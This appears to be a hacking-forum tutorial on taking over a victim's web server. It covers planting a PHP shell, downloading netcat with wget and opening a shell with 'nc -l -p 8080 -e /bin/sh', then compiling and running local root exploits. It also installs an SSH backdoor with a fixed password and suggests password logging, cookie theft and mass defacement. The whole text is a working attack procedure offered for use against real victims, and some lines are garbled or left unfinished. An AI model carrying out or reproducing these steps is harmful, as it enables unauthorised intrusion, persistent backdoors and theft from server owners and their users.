Starting off, get a PHP shell up on your victim’s site. Now what you need to do is use the back connect function, I’d recommend using a nonused port on the service because you don’t want your connections to be firewalled (if one port attempts to halt the other, its usually firewalled), port 8080 is pretty good for back connection. Warning: Port Forwarding MIGHT be required.
Starting off, install netcat for Windows here:
Move all the files in one folder on your desktop or documents, once completed go to command prompt and find it via cd ../ and cd and then run it via process name.
You have 2 choices, you can just use the back-connection feature in shells, or you can use the command execution section. I prefer using the command execution area because BC is buggy because the server will just firewall all your BC traffic.
Requirement: You might need a precompiled NC, you can host it on freehostia, be sure its for *nix or whatever box its running, once you get it on your freehostia site, go to command execution and wget it, then chmod +x name (Where name is, be sure you only put the last URL syntax, so for example, if it was john4.freehostia/nc, only include chmod +x nc)
Once in the command execution area, type in:
./nc -l -p 8080 -e /bin/sh
Now on your machine (while in command prompt), type in:
nc VicIP 8080/code]
Once you get your shell spawned, use uname -a;id to discover some information on the server that is running. Once you get an idea of the layout/server information, look for an exploit for it. Once you find your exploit, use the wget function to make server contact, example:
Now we need to make an output and make it accessible for all users, to do this, we will use gcc (to compile our file and make an output) and chmod (to make it accessible for anyone):
gcc xpl.c -o xpl;chmod +x xpl
gcc xpl.c -o xpl : We use this to compile our file and make an output (in this case, xpl).
chmod +x xpl : We use this to make our file accessible (it gives the attacker permission to run the script)
Once completed, type in:
Once your script is ran, type in whoami to find out what user you are, you can also use id to discover what uid your under, what group your in, etc, etc. Example:
uid=0(root) gid=0(root) groups=450(apache)
Now you can add an sshdoor via:
example : ./install passwd port
./install jancok 33
ssh port : 33 login : root password : jancok
[root@serv1 ~]# uname -a;id
Linux serv1.sex.com 2.6.18-53.1.13.el5 #1 SMP Tue Feb 12 13:01:45 EST 2008 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(di sk),10(wheel)
Where can you go from here? You can setup a password logger on processlogin to get some passwords, you can use wall <script>alert(‚hi‘)</script> to steal cookies in the SSH session, you can setup a pl script to mass deface all the sites on the box, etc, etc. Have fun.